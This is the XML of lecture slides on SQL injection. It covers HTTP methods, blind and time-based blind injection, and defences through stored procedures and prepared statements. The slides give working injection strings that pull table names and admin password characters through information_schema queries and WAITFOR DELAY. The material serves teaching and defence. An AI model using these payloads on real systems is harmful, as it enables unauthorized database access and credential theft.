              <a:t>If there is a SQL injection vulnerability, the same press release should be returned</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>If the input is validated, id=5 AND 1=1 should be treated as the value, an error is generated, and no output is created</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29672607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a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="81639" tIns="42452" rIns="81639" bIns="42452"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr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t>Methods</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="822275" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="81639" tIns="42452" rIns="81639" bIns="42452"/>
          <a:lstStyle/>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GET requests the transfer of the entity referred by the URL</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HEAD requests the transfer of header meta-information only</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POST asks the server to process the included entity as “data” associated with the resource identified by the URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="863600" lvl="1" indent="-287338" defTabSz="449263">
              <a:spcBef>
                <a:spcPts val="4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Resource annotation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="863600" lvl="1" indent="-287338" defTabSz="449263">
              <a:spcBef>
                <a:spcPts val="4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Message posting (newsgroups and mailing list)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="863600" lvl="1" indent="-287338" defTabSz="449263">
              <a:spcBef>
                <a:spcPts val="4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Form data submission</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="863600" lvl="1" indent="-287338" defTabSz="449263">
              <a:spcBef>
                <a:spcPts val="4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Database input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3345395909"/>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6" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Blind SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1144837" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>When testing for vulnerability, we assume that 1=1 is always true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>However, when we inject other statements, we do not have any information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>What we know: If the same record is returned, the statement must have been true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>For example, we can ask server if the current user is “h4x0r”:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>pressRelease.jsp?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>=5 AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>user_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>()=‘h4x0r’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>By combining subqueries and functions, we can ask more complex questions (e.g., extract the name of a database table character-by-character)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29691229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9C20-1632-CA62-32A1-0669188020B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="205979"/>
            <a:ext cx="8229600" cy="857250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D570A5DD-BAB7-9293-CA56-1EAD678FF712}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1200150"/>
            <a:ext cx="8229600" cy="3753890"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Select ascii(substring((select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=database() limit 0,1),1,1))=97</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=database() limit 0,1) returns you the first table name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>substring((select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=database() limit 0,1),1,1) returns you the first character of the table name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ascii(substring((select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=database() limit 0,1),1,1)) returns you the ascii value of the first character</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Select ascii(substring((select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=database() limit 0,1),1,1))=97 returns you 1 if the table name starts with a otherwise it returns 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Source: https://lakshmi993.medium.com/blind-sql-injection-mysql-data-base-d2f35afbc451</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="232146422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58DD-C45A-7BA4-5266-CE10A6611193}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Time-Based Blind SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F3BE435-BAF3-32C1-1EF7-609CF86E17FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In specific cases, it is possible to determine if a query was successful using the timing of the reply</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, in SQL Server:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'; IF (SELECT COUNT(Username) FROM Users WHERE Username = 'Admin' AND SUBSTRING(Password, 1, 1) &gt; 'm') = 1 WAITFOR DELAY '0:0:10' --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="70155609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GB" dirty="0"/>
              <a:t>SQL Injection Solutions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="591875" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Stored Procedures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Prepared statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Statements are compiled into SQL statements before user input is added, providing a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>clear separation of what is to be considered data and what is to be considered code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A query is performed in a two-step process:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First the query is parsed and the location of the parameters identified (this is the “preparation”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then the parameters are bound to their actual values</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41908166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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> Solutions: Stored Procedures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="593923" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Original query:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>String query = “SELECT title, description from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>pressReleases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> WHERE id= “+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(“id”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Statement stat = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>dbConnection.createStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>ResultSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>rs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>stat.executeQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(query);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The first step to secure the code is to take the SQL statements out of the web application and into DB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>CREATE PROCEDURE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>getPressRelease</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> @id integer AS SELECT title, description FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>pressReleases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> WHERE Id = @id</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23407599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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> Solutions: Stored Procedures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="595971" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Now, in the application, instead of string-building SQL, a stored procedure is invoked. For example, in Java:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>CallableStatements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>cs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>dbConnection.prepareCall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(“{call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>getPressRelease</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(?)}”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>cs.setInt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(1,Integer.parseInt(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(“id”)));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>ResultSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>rs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>cs.executeQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6161123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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Solutions: Prepared Statements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="598019" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>connection.execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(`SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>yourTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> WHERE id = ? AND status = ?`, [id, status], </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   (err, results, fields) =&gt; { </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>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b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if (err) { return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>console.error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>err.message</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>); } </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>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b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>console.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(results); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>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b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
